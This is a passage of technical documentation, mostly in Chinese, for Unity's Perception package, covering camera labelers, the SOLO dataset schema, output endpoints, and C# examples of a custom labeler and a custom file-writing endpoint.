The Unity camera sensor is the default sensor selected on Perception Cameras. This sensor type enables users to capture the data output by the Camera component configured on the Perception Camera GameObject. The Super Sampling Factor field on this sensor instructs the camera to capture images at 2x, 4x, or 8x the original width and height (4x, 16x, or 64x the resolution, respectively) in order to perform a high-quality super sampling anti-aliasing (SSAA) effect. This effect uses sub-pixel averaging to produce smoother output images, with fewer aliasing artifacts around rendered geometry edges and sometimes improved aliasing around small details in textures. Note that the output resolution of this sensor does not change, regardless of the particular super sampling setting configured on it.

    Camera Labelers

Camera labelers capture camera-related data into the JSON dataset. You can use this data to train models and to compute dataset statistics. The Perception package provides several CameraLabelers, and you can derive from the CameraLabeler class to define more.

    Semantic Segmentation Labeler

(figure: semantic segmentation example output)

SemanticSegmentationLabeler generates a 2D RGB image using the attached Camera. Unity draws objects with the color associated with their label in the SemanticSegmentationLabelingConfiguration. If Unity cannot find a label for an object, it draws it in black.

    Instance Segmentation Labeler

The **Instance Segmentation Labeler** generates a 2D RGB image using the attached camera. Unity draws each instance of a labeled object with a unique color.

    Bounding Box 2D Labeler

(figure: 2D bounding box visualization)

BoundingBox2DLabeler produces 2D bounding boxes for each visible object that has a label defined in the IdLabelConfig. Unity computes the bounding boxes from the rendered image, so it excludes only the occluded or out-of-frame portions of objects.

    Bounding Box 3D Labeler

The Bounding Box 3D Labeler produces 3D ground truth bounding boxes for each labeled GameObject in the scene. Unlike 2D bounding boxes, 3D bounding boxes are computed from the labeled meshes in the scene, and all objects are recorded regardless of their occlusion state.

***Note:*** the Bounding Box 3D Labeler only supports non-nested skinned mesh renderer objects.

    Object Count Labeler

    {
    "label_id": 25,
    "label_name": "drink_whippingcream_lucerne",
    "count": 1
    }

ObjectCountLabeler records the object counts for each label you define in the IdLabelConfig. Unity only records objects that have at least one visible pixel in the camera frame.

    Rendered Object Info Labeler

    {
    "label_id": 24,
    "instance_id": 320,
    "visible_pixels": 28957
    }

RenderedObjectInfoLabeler records a list of all objects visible in the camera image, including their instance ID, resolved label ID, and visible pixel count. If Unity cannot resolve an object to a label in the IdLabelConfig, it does not record the object.

    Keypoint Labeler

The **Keypoint Labeler** captures the screen locations of specific points on labeled GameObjects. The typical use of this labeler is to capture human pose estimation data, but it can be used to capture points on any kind of object. The labeler uses a keypoint template, which defines the keypoints to capture for the model and the skeletal connections between those keypoints. The positions of the keypoints are recorded in pixel coordinates.
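
To make the output shape concrete, here is a hypothetical sketch of a single keypoint entry; it illustrates the idea (point index, pixel location, and a visibility state) rather than the exact schema, which you should confirm from a generated dataset:

{
"index": 8,
"location": [ 642.0, 381.5 ],
"state": 2
}

A state flag of this kind typically distinguishes keypoints that are absent, present but occluded, or present and visible.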

    Occlusion Labeler

    {
    "instanceId": 1,
    "percentVisible": 0.25,
    "percentInFrame": 0.5,
    "visibilityInFrame": 0.5
    }

The **Occlusion Labeler** reports a set of visibility metrics for each object visible within the frame. Each set contains three metrics:

1. Percent Visible: the visible portion of the object.
2. Percent In Frame: the portion of the object not cut off by the camera frame.
3. Visibility In Frame: the unoccluded portion of the part of the object that is in the frame.

These satisfy $percentVisible = percentInFrame \times visibilityInFrame$. In the JSON excerpt above, for example, half the object is in the frame (0.5) and half of that part is unoccluded (0.5), giving a visible fraction of 0.25.

    Depth Labeler

    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.DepthAnnotation",
    "id": "Depth",
    "sensorId": "camera",
    "description": "Generates a 32-bit depth image in EXR format where each pixel contains the actual distance in Unity units (usually meters) from the camera to the object in the scene.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Depth.exr"
    }
    ]
Example annotation output for a depth frame

The **Depth Labeler** outputs a 32-bit depth image in EXR format. Each pixel contains the actual distance from the camera to the object in the scene, in Unity units (usually meters). The depth values are written directly to the R channel.

Depth maps can be opened with RenderDoc.

    Normal Labeler

    "annotations": [
    {
    "@type": "type.unity.com/unity.solo.NormalAnnotation",
    "id": "Normal",
    "sensorId": "camera",
    "description": "Produces an image capturing the vertex normals of objects within the frame.",
    "imageFormat": "Exr",
    "dimension": [
    736.0,
    483.0
    ],
    "filename": "step0.camera.Normal.exr"
    }
    ]

The **Normal Labeler** captures the vertex normals of objects in a 3-channel image. This normals image is encoded in EXR format. The RGB channels of the image store the X, Y, and Z components, respectively, of each pixel's vertex normal.

    Environment Labeler

The **Environment Labeler** produces information about the scene's environment, such as the hierarchy of its labeled objects.

Available Information

Label Hierarchy: the label hierarchy (the hierarchy field in the JSON) provides the parent-child relationships between labeled objects, uniquely identified by their instance IDs. Users can decide whether to generate the label hierarchy only for visible objects or for all objects in the scene. Disabled objects are always ignored.

    Annotation Example
    {
    "@type": "type.unity.com/unity.solo.EnvironmentStateMetric",
    "id": "environment",
    "sensorId": "",
    "annotationId": "",
    "description": "Captures details about the environment such as label hierarchy",
    "hierarchy": [
    {
    "instance_id": 1,
    "parent_instance_id": null,
    "child_instance_ids": [ 3, 4]
    },
    {
    "instance_id": 5,
    "parent_instance_id": 2,
    "child_instance_ids": []
    },
    {
    "instance_id": 2,
    "parent_instance_id": null,
    "child_instance_ids": [5]
    }
    ]
    }

    Pixel Position Labeler

The Pixel Position Labeler outputs, per pixel, the camera-space offset from the camera to the object. The output is an image file in EXR format with the following per-pixel encoding. Consider a vector $v_{AB} = (x, y, z)$ from the camera to the object visible at pixel $(A, B)$:

Red channel: the $x$ component of $v_{AB}$

Green channel: the $y$ component of $v_{AB}$

Blue channel: the $z$ component of $v_{AB}$

Alpha channel: always set to 1
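
Assuming the Depth Labeler above records the Euclidean distance from the camera, the two outputs are related per pixel by $depth(A, B) = \lVert v_{AB} \rVert = \sqrt{x^2 + y^2 + z^2}$, so the Pixel Position image carries strictly more information than the depth image.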

    Metadata Labeler

At the end of each frame, this labeler takes the data from all MetadataTags in the scene and records it to the metadata section of the resulting JSON.

Included metadata tags

• LabelingNameMetadataTag
  • Adds information about the GameObject's name
  • A simple example of how to add data to the frame JSON
• LabelingTagMetadataTag
  • Adds information about the GameObject's tag
  • A simple example of how to add data to the frame JSON
• LightMetadataTag
  • Adds information about a light's intensity and color
  • An example of how to inject scene-related information into the frame JSON
• LabelingChildNameMetadataTag
  • Reports the names of child objects into the parent's data
  • An example of how to group data from different objects into the same report
• LabelingDistanceToMainCameraMetadataTag
  • Reports the distance from the GameObject to the main camera
  • A simple example of how to perform a Unity Engine computation for a report
• LabelingKeyValuesMetadataTag
  • Adds the ability to attach custom strings through the Unity Editor
  • An example of how to add custom information through the Unity Editor
• LabelingTransformDataMetadataTag
  • Adds information about the GameObject's transform
  • An example of how to choose which information to include in the frame JSON from the Unity Editor

To create a custom metadata tag:

1. Inherit from LabelMetadataTag

2. Implement the required abstract methods

  2.1 key: the name of the object in the serialized JSON file

  2.2 GetReportedValues(IMessageBuilder builder): add whatever information you need via the builder, e.g. builder.Add("object_name", dataToBeAdded)

3. Add the component to a labeled GameObject
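
Following the steps above, a minimal sketch of a custom tag. It assumes the LabelMetadataTag base class exposes exactly the two abstract members described; the class name is illustrative, and the namespaces and member signatures may differ by package version:

using UnityEngine.Perception.GroundTruth;
using UnityEngine.Perception.GroundTruth.DataModel;

public class ChildCountMetadataTag : LabelMetadataTag
{
    // Step 2.1: the key under which this object's data appears in the serialized JSON
    protected override string key => "child_count";

    // Step 2.2: add any information you need through the builder
    protected override void GetReportedValues(IMessageBuilder builder)
    {
        // Report the number of children of this GameObject
        builder.AddInt("count", transform.childCount);
    }
}

Step 3 is then simply adding ChildCountMetadataTag to a GameObject that carries a Labeling component.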

    Limitations

Ground truth is not compatible with all rendering features, especially those that modify the visibility or shape of objects in the frame.

When generating ground truth:

• Unity does not run vertex and geometry shaders
• Unity does not run post-processing effects, except the built-in lens distortion in HDRP

    Dataset Capture

DatasetCapture tracks sensors, annotations, and metrics, and passes the data to the active endpoint. It also controls the simulation time elapsed per frame to accommodate the active sensors.


The code below is a custom camera labeler (CameraLabeler) that adds labels and metrics to the scene for use in training and evaluating models.

In a Perception Camera, a Label typically marks an object in the scene, such as a person, a car, or a building, along with its attributes, such as category, size, or color. This information can be added or modified through a labeler and used to train and evaluate machine learning models.

A Metric, on the other hand, measures physical quantities in the scene or indicators of the training and evaluation process, such as the position of a light, the velocity of an object, or the accuracy of a model. This information can be recorded for deeper analysis of the scene later. Compared with Labels, Metrics focus more on numeric precision and repeatability, helping developers analyze and improve an algorithm's performance.

In short, a Label marks an object in the scene, while a Metric measures a physical quantity in the scene or the performance of a model. The two have different use cases, but both serve as key sources of information for machine learning and computer vision tasks.

    using System;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Rendering;

public class CustomLabeler : CameraLabeler // CustomLabeler derives from CameraLabeler
{
// Override the description, labelerId, and supportsVisualization properties
public override string description => "Demo labeler";
public override string labelerId => "Demo labeler";
protected override bool supportsVisualization => false;

// Public GameObject fields referencing the light and the target object to be labeled
public GameObject targetLight;
public GameObject target;

// The metric definition for the light and the annotation definition for the target's position
MetricDefinition lightMetricDefinition;
AnnotationDefinition targetPositionDef;

// An AnnotationDefinition subclass describing the target's position in camera space
class TargetPositionDef : AnnotationDefinition
{
// The constructor takes a string ID used to initialize the annotation definition instance
public TargetPositionDef(string id)
: base(id) { }

// modelType: a read-only string property identifying the type of this annotation definition
public override string modelType => "targetPosDef";
// description: a read-only string property describing the purpose of this annotation definition
public override string description => "The position of the target in the camera's local space";
}

// A serializable Annotation class holding the target's position in camera space
[Serializable]
class TargetPosition : Annotation
{
// The constructor takes an AnnotationDefinition instance, the sensor ID,
// and the target's position in camera space (pos), and initializes the base class
public TargetPosition(AnnotationDefinition definition, string sensorId, Vector3 pos)
: base(definition, sensorId)
{
position = pos;
}

// The target's position in camera space
public Vector3 position;

// ToMessage(): converts this annotation instance into a message for transport and analysis
public override void ToMessage(IMessageBuilder builder)
{
base.ToMessage(builder);
// Convert position into a float array and add it to the message body
builder.AddFloatArray("position", MessageBuilderUtils.ToFloatVector(position));
}

// Checks whether this annotation instance is valid; always returns true here
public override bool IsValid() => true;

}

// Setup() registers the lightMetricDefinition metric and the targetPositionDef annotation definition
protected override void Setup()
{
// Create a MetricDefinition representing the light's world-space position.
// The constructor takes three strings: the unique ID, the name, and the description of the metric.
lightMetricDefinition =
new MetricDefinition(
"LightMetric",
"lightMetric1",
"The world-space position of the light");
// Register the metric definition with DatasetCapture
DatasetCapture.RegisterMetric(lightMetricDefinition);

// Create a TargetPositionDef representing the target object's position relative
// to the camera, initialized with a string ID
targetPositionDef = new TargetPositionDef("target1");
// Register the annotation definition with DatasetCapture
DatasetCapture.RegisterAnnotationDefinition(targetPositionDef);
}

// OnBeginRendering() is called before the scene is rendered: report the light's position
// as a metric, then compute the target's position in camera space and report it as an annotation
protected override void OnBeginRendering(ScriptableRenderContext scriptableRenderContext)
{
// Report the light's world-space position as a GenericMetric,
// manually creating the json array of values
var lightPos = targetLight.transform.position;
var metric = new GenericMetric(new[] { lightPos.x, lightPos.y, lightPos.z }, lightMetricDefinition);
DatasetCapture.ReportMetric(lightMetricDefinition, metric);

// compute the location of the object in the camera's local space
Vector3 targetPos = perceptionCamera.transform.worldToLocalMatrix * target.transform.position;

// Report using the PerceptionCamera's SensorHandle if scheduled this frame
var sensorHandle = perceptionCamera.SensorHandle;

if (sensorHandle.ShouldCaptureThisFrame)
{
var annotation = new TargetPosition(targetPositionDef, sensorHandle.Id, targetPos);
sensorHandle.ReportAnnotation(targetPositionDef, annotation);
}
}
}

    Example metric that is added each frame in the dataset:

    {
    "capture_id": null,
    "annotation_id": null,
    "sequence_id": "9768671e-acea-4c9e-a670-0f2dba5afe12",
    "step": 1,
    "metric_definition": "lightMetric1",
    "values": [
    96.1856,
    192.675964,
    -193.838638
    ]
    },

**Example annotation that is added to each capture in the dataset:**

    {
    "annotation_id": "target1",
    "model_type": "targetPosDef",
    "description": "The position of the target in the camera's local space",
    "sensor_id": "camera",
    "id": "target1",
    "position": [
    1.85350215,
    -0.253945172,
    -5.015307
    ]
    }

    Output Endpoint

Dataset Capture tracks sensors, annotations, and metrics, and passes the data to the Endpoint. The Endpoint is responsible for packaging the data into a format usable by the consumer.

    Supported Endpoints

The Perception package includes three built-in endpoint options:

1. (Recommended) SOLO Endpoint

Our latest output format writes captured information to the relevant directories as the simulation progresses. This differs from our previous approach of writing data at the end of the simulation, and enables you to view data while a long simulation is still running. See the full list of advantages the SOLO endpoint has over our previous Perception endpoint.


A SOLO dataset is a combination of JSON and image files. This document describes the schema used to store the data.

The SOLO schema provides a generic structure for simulation output that can easily be consumed to show statistics or train machine learning models.

A SOLO dataset consists of sensor captures, annotations, and metrics, e.g. images and 2D bounding box labels.

This data comes in various forms and may be captured by different sensors and annotation mechanisms.

Multiple sensors may produce captures at different frequencies.

Goals

The schema should:

• Include captured sensor data and annotations in one well-defined format. This allows us to maintain a contract between the Perception package and the consumers of the dataset (e.g. statistics and ML modeling...)

• Maintain the relationships between captured data and annotations taken by the same sensor at the same time. It should also maintain the relationships between consecutive captures for time-related perception tasks (such as object tracking).

• Support streaming data, since the data will be created on the fly during the simulation from multiple processes or cloud instances.

• Make it easy to support new types of sensors and annotations.

Terminology

• simulation: one or more builds of a Unity player, possibly with different parameters.
• capture: a full rendering process of a Unity sensor that saves the rendered result to data files (e.g. png, pcd, etc.)
• frame: an actual frame in the Unity simulation
• sequence: a time-ordered series of captures generated by a simulation. (Each Iteration of a Perception Scenario corresponds to one SOLO data sequence.)
• step: the index of data-producing frames within a sequence.
• annotation: recorded data (such as bounding boxes or semantic segmentation) describing a particular capture at the same timestamp. A capture may include multiple types of annotations.
• label: a string token (e.g. car, human.adult, etc.) that represents a semantic type or class. One GameObject may have multiple labels used for different annotation purposes.
• coordinate systems: the schema uses three coordinate systems:
  • global coordinate system: coordinates with respect to the global origin in Unity.
  • ego coordinate system: coordinates with respect to the ego to which the sensors are attached.
  • sensor coordinate system: coordinates with respect to the sensor. This is useful for ML model training for a single sensor, and can be transformed from the global and ego coordinate systems. Raw values of object poses using the sensor coordinate system are rarely recorded in a simulation.
Structure

(figure: SOLO dataset structure)

SOLO data is stored in a sequence/step hierarchy. The top level of the generated data includes the metadata and definition files, plus a directory for each captured sequence.

Within a sequence directory there is a JSON file containing all of the annotations and metrics for each frame.

Files from sensors and annotators (such as RGB captures or segmentation masks) also reside in this directory. For organizational purposes, all files follow a strict naming pattern; frame files are named as follows:

• step.NNNN.frame.json
  • NNNN is the sequence number of the step
• step.NNNN.ID.EXT
  • NNNN is the sequence number of the step
  • ID is the registered ID of the sensor or labeler that created the file
  • EXT is the file extension

The top-level directory contains:

• metadata.json: the metadata file contains simulation-wide data. These values are either generated once automatically by the Perception package or are system-wide metadata.
    {
    "unityVersion": "2021.3.11f1",
    "perceptionVersion": "1.0.0-preview.1",
    "renderPipeline": "HDRP",
    "simulationStartTime": "2023/6/21 8:17:17",
    "scenarioRandomSeed": 539662031,
    "scenarioActiveRandomizers": [
    "BackgroundObjectPlacementRandomizer",
    "TextureRandomizer",
    "HueOffsetRandomizer",
    "ForegroundObjectPlacementRandomizer",
    "RotationRandomizer"
    ],
    "totalFrames": 100,
    "totalSequences": 100,
    "sensors": [
    "camera"
    ],
    "metricCollectors": [
    "ObjectCount",
    "RenderedObjectInfo",
    "scenario_iteration",
    "random-seed"
    ],
    "simulationEndTime": "2023/6/21 8:17:21",
    "annotators": [
    {
    "name": "bounding box",
    "type": "type.unity.com/unity.solo.BoundingBox2DAnnotation"
    },
    {
    "name": "semantic segmentation",
    "type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation"
    }
    ]
    }
• sensor_definitions.json: contains the definitions of all sensors in the dataset.
    {
    "sensorDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.RGBCamera",
    "id": "camera",
    "modality": "camera",
    "description": "",
    "firstCaptureFrame": 0.0,
    "captureTriggerMode": "Scheduled",
    "simulationDeltaTime": 0.0166,
    "framesBetweenCaptures": 0,
    "manualSensorsAffectTiming": false
    }
    ]
    }
• annotation_definitions.json: contains the definitions of all annotations in the dataset.
    {
    "annotationDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.BoundingBox2DAnnotation",
    "id": "bounding box",
    "description": "Produces 2D bounding box annotations for all visible objects that bear a label defined in this labeler's associated label configuration.",
    "spec": [
    {
    "label_id": 1,
    "label_name": "candy_minipralines_lindt"
    },

    ...

    {
    "label_id": 10,
    "label_name": "snack_granolabar_naturevalley"
    }
    ]
    },
    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "semantic segmentation",
    "description": "Generates a semantic segmentation image for each captured frame. Each object is rendered to the semantic segmentation image using the color associated with it based on this labeler's associated semantic segmentation label configuration. Semantic segmentation images are saved to the dataset in PNG format. Please note that only one SemanticSegmentationLabeler can render at once across all cameras."
    }
    ]
    }
• metric_definitions.json: contains the definitions of all metrics in the dataset.
{
"metricDefinitions": [
{
"@type": "type.unity.com/unity.solo.ObjectCountMetric",
"id": "ObjectCount",
"description": "Produces object counts for each label defined in this labeler's associated label configuration."
},
{
"@type": "type.unity.com/unity.solo.RenderedObjectInfoMetric",
"id": "RenderedObjectInfo",
"description": "Produces label id, instance id, and visible pixel count in a single metric each frame for each object which takes up one or more pixels in the camera's frame, based on this labeler's associated label configuration."
},
{
"@type": "type.unity.com/unity.solo.GenericMetric",
"id": "scenario_iteration",
"description": "Iteration information for dataset sequences"
},
{
"@type": "type.unity.com/unity.solo.GenericMetric",
"id": "random-seed",
"description": "The random seed used to initialize the random state of the simulation. Only triggered once per simulation."
}
]
}

Each sequence gets its own directory, which contains all of its captures. Sequence directories follow the naming convention sequence.X, where X is a numeric value starting at 0. For example, the first three sequence directories of a simulation are named:

• sequence.0
• sequence.1
• sequence.2

A sequence directory contains all of the captures, annotations, and metrics for the sequence.

All data file names begin with the step at which they were captured; the naming rules then differ by file type:

    File Structure
dataset.XXXX
├── metadata.json
├── sensor_definitions.json
├── annotation_definitions.json
├── metric_definitions.json
└── sequence.NUM
    ├── step.NUM.frame.json
    ├── step.NUM.capture.SENSOR[_ID].[ext]
    └── step.NUM.annotation.NAME[_ID].SENSOR[_ID].[ext]
    Example Dataset Layout
dataset
├── metadata.json
├── sensor_definitions.json
├── annotation_definitions.json
├── metric_definitions.json
├── sequence.1
│   ├── step.1.frame.json
│   ├── step.1.rgb.front_camera.png
│   ├── step.1.semantic_segmentation_0.png
│   ├── step.1.semantic_segmentation_1.png
│   ├── step.1.instance_segmentation.png
│   ├── step.2.frame.json
│   ├── step.2.rgb.front_camera.png
│   ├── step.2.semantic_segmentation_0.png
│   ├── step.2.semantic_segmentation_1.png
│   └── step.2.instance_segmentation.png
└── sequence.2
    ├── step.1.frame.json
    ├── step.1.rgb.front_camera.png
    ├── step.1.semantic_segmentation_0.png
    ├── step.1.semantic_segmentation_1.png
    ├── step.1.instance_segmentation.png
    ├── step.2.frame.json
    ├── step.2.rgb.front_camera.png
    ├── step.2.semantic_segmentation_0.png
    ├── step.2.semantic_segmentation_1.png
    └── step.2.instance_segmentation.png
    Frame

For step.1.frame.json, the file structure and an explanation:

(figure: frame JSON structure)

    frame {
    frame: <int> -- The integer ID of the frame
    sequence: <int> -- The sequence number
    step: <int> -- The step inside the sequence
timestamp: <int> -- Timestamp in milliseconds since the sequence started
captures: [<capture>,...] [optional] -- The list of captures (see below)
metrics: [<metric>,...] [optional] -- The list of metrics recorded for the frame (see below)
    }
    Capture

(figure: capture record structure)

A capture record contains the relationship between a captured file, a collection of annotations, and extra metadata that describes the state of the sensor.

    capture {
    @type: <str> -- The class type of the sensor
    id: <str> -- The ID of the sensor that made the capture
    description: <str> -- Human readable description of the sensor
    position: <float3> -- Position in meters: (x, y, z) with respect to the global coordinate system
    rotation: <float4> -- Orientation as quaternion: w, x, y, z
    velocity: <float3> -- Velocity in meters per second as v_x, v_y, v_z
    acceleration: <float3> [optional] -- Acceleration in meters per second^2 as a_x, a_y, a_z
    annotations: [<obj>,...] [optional] -- List of the annotations in this capture. See below.
    }
    RGB Capture

(figure: RGB capture record structure)

    rgb_capture : capture {
    filename: <str> -- A single file that stores sensor captured data.
    imageFormat: <str> -- The format of the sensor captured file. (e.g. "Png")
    dimension: <int2> -- The image size in pixels (width/height)
    projection: <string> -- holds the type of projection the camera used for that capture: Options: "perspective" or "orthographic"
    matrix: <float3> -- The projection matrix of the camera
    }

    reference: [camera_intrinsic](https://www.mathworks.com/help/vision/ug/camera-calibration.html#bu0ni74)
    Sequence, Step, and Timestamp

In some use cases, two consecutive captures may not be related in time during the simulation. For example, if we generate randomly placed objects in the scene for X steps of simulation, then the sequence, step, and timestamp are irrelevant for the captured data. We can record a default value for the sequence, step, and timestamp of these types of captures. In cases where we need to maintain the chronological relationship between captures (e.g. a sequence of camera captures in a 10-second video) and metrics, we need sequence, step, and timestamp values that preserve the time order of the captures.

In SOLO, a sequence represents a collection of any time-ordered captures and annotations and corresponds to one iteration of a perception scenario. The timestamp refers to the simulation wall clock, in milliseconds since the sequence started. A step is an integer value that increments whenever a capture or metric event is triggered. We cannot use timestamps to synchronize between two different events, because timestamps are floats and therefore make poor indices. Instead, we use a step counter that makes it easy to correlate metrics and captures that occur at the same time.

Below is an illustration of how captures, metrics, timestamps, and steps are synchronized.

(figure: synchronization of captures, metrics, timestamps, and steps)

Since each sensor may trigger captures at a different frequency, at the same timestamp we may include anywhere from 0 to N captures, where N is the total number of sensors included in the scenario. If two sensors capture at the same timestamp, they should share the same sequence, step, and timestamp values.

    Annotation

(figure: annotation record structure)

An annotation record contains the ground truth for a sensor, either inline or in a separate file. A single capture may contain many annotations, one for each active Labeler in the simulation.

    annotation {
    @type: <str> -- The class type of the annotation
    id: <str> -- The registered ID of the annotation
    sensorId: <str> -- The ID of the sensor that this annotation is attached to
    description: <str> -- The human readable description of the sensor
    }

In addition to the above, an annotation may include an array of the individual objects recorded for that annotation, such as a list of bounding boxes. We look at a few examples below. This array is typically named values or instances.

    Example Annotations
    Semantic Segmentation

A semantic segmentation annotation extends the base annotation class to include the filename of a color mask in PNG format, where each color maps to a unique object class.

    SemanticSegmentationAnnotation {
    @type: "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
id: <str> -- The registered ID of the annotation
sensorId: <str> -- The ID of the sensor that this annotation is attached to
description: <str> -- The human readable description of the sensor
imageFormat: <str> -- Format of the segmentation mask ("Png")
dimension: <int2> -- Width and height of the output image
instances [ -- Array of recorded object classes and their unique R,G,B pixel values
{
labelName: <str> -- String identifier of the object class label
pixelValue: <int4> -- R,G,B,A values for this label's unique color [0-255]
    }, ...
    ]
    }

Example semantic segmentation annotation:

    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "9ca0e2e4-5a0f-4ee3-8cae-b34565275059",
    "sensorId": "camera",
    "description": "Produces a semantic segmentation RGB mask",
    "imageFormat": "Png",
    "dimension": [
    1600.0,
    1200.0
    ],
    "filename": "step1.camera.9ca0e2e4-5a0f-4ee3-8cae-b34565275059.png",
    "instances": [
    {
    "labelName": "Baseboard-1",
    "pixelValue": [
    177,
    255,
    101,
    255
    ]
    }, ...
    ]
    }

An example semantic segmentation mask is shown below. Note how items of the same class (for example, the dining chairs) share the same color:

(figure: example semantic segmentation mask)

Note: unlabeled objects are rendered black in the segmentation mask.

Instance Segmentation

Similar to semantic segmentation, an instance segmentation annotation includes the filename of a color mask in PNG format. This time, each unique object has a unique color. The schema differs slightly from semantic segmentation in that it also includes an instanceId (an object ID unique across the entire simulation) and a labelId (the numeric identifier of the object class). For example:

    "instances": [
    {
    "instanceId": 19,
    "labelId": 273,
    "labelName": "Wall",
    "color": [
    255,
    53,
    0,
    255
    ]
    }, ...
    ]

    示例实例分段掩码如下所示。请注意每个对象如何具有唯一的颜色:

    png

    2D Bounding Box

    每个边界框记录将一个元组(实例、标签)映射到一组 4 个变量(x、y、宽度、高度),用于绘制边界框。

    3D Bounding Box

    三维边界框信息。与 2D 边界框不同,3D 边界框坐标是在传感器坐标系中捕获的。每个边界框记录将一个元组(实例、标签)映射到绘制三维边界框的平移、大小和旋转,以及三维边界盒的速度和加速度(可选)。

    Keypoints

    关键点数据,通常用于人体姿态估计。

    Metrics

    度量存储可用于描述特定序列、捕获或注释的额外元数据。度量记录存储为任意数量(M)的键值对。对于序列度量,capture_id、annotation_id 和 step 应为 null。对于捕获度量,annotation_id 可以为 null。对于注释度量,sequence_id、capture_id、annotation_id 和 step 这四列都不为空。度量文件可以从不同的模拟实例并行生成。

    Definitions

The sensor, annotation, and metric definition tables are static over the course of the simulation. They usually come from the definition of the simulation and are generated during the run.

    sensor_definitions.json

A JSON file containing the collection of all sensors present in the simulation. Each sensor is assigned a unique UUID. Each one is associated with an ego and stores the ego's UUID as a foreign key.

Sensors extend this base sensor class and can include additional fields in their definitions.

    annotation_definitions.json

A JSON file containing a collection of annotation specifications (annotation_definition). Each record describes one particular type of annotation.

    metric_definitions.json

A JSON file that stores a collection of metric specification records (metric_definition). Each specification record describes a particular metric stored in the metric values.

    Schema Versioning

Versioning of the schema.

    2. Perception Endpoint

Our legacy Perception output format, in which information is stored in captures and written at the end of the simulation (or in 150-frame chunks). Although this endpoint still supports all the new Labelers, such as depth and occlusion, we strongly recommend trying the SOLO endpoint above for an easier post-processing and debugging experience.

    3. No Output Endpoint

When selected, this endpoint writes no information to disk! This is useful to avoid generating extraneous datasets while debugging simulation logic in the Editor or testing with the Perception Camera's real-time visualization tools.

    How to Change the Active Endpoint

1. Project Settings → Perception
2. Click Change Endpoint Type
3. Select your preferred endpoint from the dropdown list.

    Creating your Own Endpoint

With the Endpoint system, creating your own endpoint for your preferred output format is not only possible but quite approachable. We have put together a small example of a hypothetical custom endpoint to walk you through the basics of creating, iterating on, and using your own custom endpoint.

Custom endpoints are supported from Perception package version 0.11.0-preview.1 onward. Previously, all data generated by Perception was automatically written to disk in our proprietary output format. With a custom endpoint, however, you can use our intermediate representation to write all the data in an output format of your choice!

We demonstrate this with a hypothetical endpoint we call "FlatEndpoint", which writes all the data of each simulation run into one unique folder. To do this, we create a new class and implement IConsumerEndpoint. This lets our custom endpoint be selected in the Perception Settings UI and used as the simulation's endpoint. We additionally implement the IFileSystemEndpoint interface to hook into how Perception records where the last created dataset lives, so that features such as the "Show Latest Dataset" button work correctly.

    using System;
    using System.Collections.Generic;
    using System.IO;
    using Newtonsoft.Json.Linq;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.Consumers;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Perception.Settings;

    namespace MyCustomNamespace
    {
/// <summary>
/// Example endpoint which outputs all information in small files to one single directory.
/// We demonstrate two methods of serializing data: (1) Custom serialization; (2) IMessageProducers
/// </summary>
/// <remarks>For more complex examples, check out SoloEndpoint</remarks>
    [Serializable]
    public class FlatEndpoint : IConsumerEndpoint, IFileSystemEndpoint
    {
    public string prefix = "FLAT";

    DateTimeOffset m_SimulationStartTime;

/// Helper function to create a new JsonMessageBuilder
    JsonMessageBuilder GetNewJsonMessageBuilder() => new JsonMessageBuilder();

    #region IFileSystemEndpoint

/// <summary>
/// Allows the user to set the base path from the Perception Settings UI.
/// </summary>
    public string basePath
    {
    get => PerceptionSettings.GetOutputBasePath();
    set => PerceptionSettings.SetOutputBasePath(value);
    }

    string m_CachedCurrentPath = string.Empty;
/// <summary>
/// The root directory to use for all files that we output.
/// </summary>
    public string currentPath
    {
    get
    {
    // Check if we already reserved the output path for this simulation run
    if (!string.IsNullOrWhiteSpace(m_CachedCurrentPath))
    return m_CachedCurrentPath;

    // A small piece of logic to get the next available directory name
    // get: {basePath}/FLAT_0
    // if above already exists, then get: {basePath}/FLAT_1
    // ... and so on

    var availableSuffix = 0;
    m_CachedCurrentPath = string.Empty;
    do
    {
    m_CachedCurrentPath = Path.Combine(basePath, $"{prefix}_{availableSuffix}");
    availableSuffix++;
    }
    while (Directory.Exists(m_CachedCurrentPath));

    // actually create the directory we decided upon above
    Directory.CreateDirectory(m_CachedCurrentPath);

    return m_CachedCurrentPath;
    }
    }

/// <summary>
/// The path used when "Reset to Default" is used in the Perception Settings UI.
/// </summary>
    public string defaultPath => Path.Combine(Application.persistentDataPath);
    #endregion

    #region IConsumerEndpoint

    public string description => "Example endpoint that puts all the files in one single directory";

/// <summary>
/// Validate the configuration of your endpoint before the simulation runs.
/// </summary>
    public bool IsValid(out string errorMessage)
    {
    // Check if the prefix supplied by the user is empty or whitespace
    if (string.IsNullOrWhiteSpace(prefix))
    {
    errorMessage = "Prefix must not be empty.";
    return false;
    }

    errorMessage = $"Directory {basePath} does not exist. Please create the directory.";
// To create {basePath}/FLAT_{xyz}, we need to ensure that the {basePath} directory exists.
// If it doesn't, the Perception Settings UI will show the above error message.
    return Directory.Exists(basePath);
    }

    public void SimulationStarted(SimulationMetadata metadata)
    {
// record when the simulation started so we can use it to calculate the
// duration of the simulation in the SimulationCompleted function
    m_SimulationStartTime = DateTimeOffset.Now;
    }

    public void SensorRegistered(SensorDefinition sensor)
    {
//// Using Method 1 (Custom Serialization)
// 1. Create a new JsonMessageBuilder class
    var builder = GetNewJsonMessageBuilder();

    // 2. Add all relevant fields to the builder as unique key-value pairs
    builder.AddString("model_type", sensor.modelType);
    builder.AddString("capture_mode", sensor.captureTriggerMode.ToString());
    builder.AddString("id", sensor.id);
    builder.AddInt("frames_between_captures", sensor.framesBetweenCaptures);
    builder.AddFloat("first_capture_frame", sensor.firstCaptureFrame);

// Invariant: The builder now contains a representation of the sensor class
// 3. We can use the ToJson function in the builder to write that representation to JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"sensor-{sensor.id}.json"),
